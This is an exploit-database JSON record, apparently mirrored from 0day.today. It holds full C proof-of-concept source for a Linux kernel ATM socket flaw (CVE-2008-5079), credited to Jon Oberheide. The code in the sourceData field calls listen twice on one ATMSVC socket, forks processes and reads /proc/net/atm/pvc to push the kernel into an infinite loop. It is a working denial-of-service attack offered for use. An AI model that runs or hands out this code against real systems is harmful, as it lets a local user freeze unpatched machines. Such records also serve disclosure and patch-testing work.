{"published": "2008-12-10T00:00:00", "id": "1337DAY-ID-6684", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category dos / poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-31T01:26:28", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-31T01:26:28", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-31T01:26:28", "edition": 2, "title": "Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit", "href": "https://0day.today/exploit/description/6684", "modified": "2008-12-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/6684", "references": [], "reporter": "Jon Oberheide", "sourceData": "===============================================================\r\nLinux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n\r\n/*\r\n * cve-2008-5079.c\r\n *\r\n * Linux Kernel <= 2.6.27.8 ATMSVC local DoS\r\n * Jon Oberheide <[email\u00a0protected]>\r\n *\r\n * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:\r\n *\r\n * net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8\r\n * and earlier allows local users to cause a denial of service \r\n * (kernel infinite loop) by making two calls to svc_listen for the\r\n * same socket, and then reading a /proc/net/atm/*vc file, related \r\n * to corruption of the vcc table. \r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <linux/atm.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n \r\n#define NR_CPUS 8\r\n#define PROC_ATM \"/proc/net/atm/pvc\"\r\n \r\nint\r\nmain(void)\r\n{\r\n char *err, dummy[1024];\r\n int i, ret, sock, proc;\r\n struct atm_qos qos;\r\n struct sockaddr_atmsvc addr;\r\n \r\n printf(\"[+] creating ATM socket...\\n\");\r\n \r\n sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);\r\n if (sock < 0) {\r\n err = \"socket(2) for type PF_ATMSVC failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n \r\n memset(&qos, 0, sizeof(qos));\r\n qos.rxtp.traffic_class = ATM_UBR;\r\n qos.txtp.traffic_class = ATM_UBR;\r\n qos.aal = ATM_NO_AAL;\r\n \r\n printf(\"[+] setting socket QoS options...\\n\");\r\n \r\n ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));\r\n if (ret == -1) {\r\n err = \"setsockopt(2) for option SO_ATMQOS failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n addr.sas_family = AF_ATMSVC;\r\n \r\n printf(\"[+] binding socket...\\n\");\r\n \r\n bind(sock, (struct sockaddr *) &addr, sizeof(addr));\r\n \r\n printf(\"[+] socket listen...\\n\");\r\n \r\n listen(sock, 10);\r\n \r\n printf(\"[+] duplicate socket listen...\\n\");\r\n \r\n listen(sock, 10);\r\n \r\n printf(\"[+] attempting local DoS...\\n\");\r\n \r\n for (i = 0; i < NR_CPUS; ++i) {\r\n if (fork() != 0) {\r\n break;\r\n }\r\n }\r\n \r\n proc = open(PROC_ATM, O_RDONLY);\r\n if (proc == -1) {\r\n err = \"opening \" PROC_ATM \" failed\";\r\n printf(\"[-] PoC error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n ret = read(proc, &dummy, 1024);\r\n close(proc);\r\n \r\n printf(\"[-] Local DoS failed.\\n\");\r\n \r\n return 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-31] #", "immutableFields": []}

{}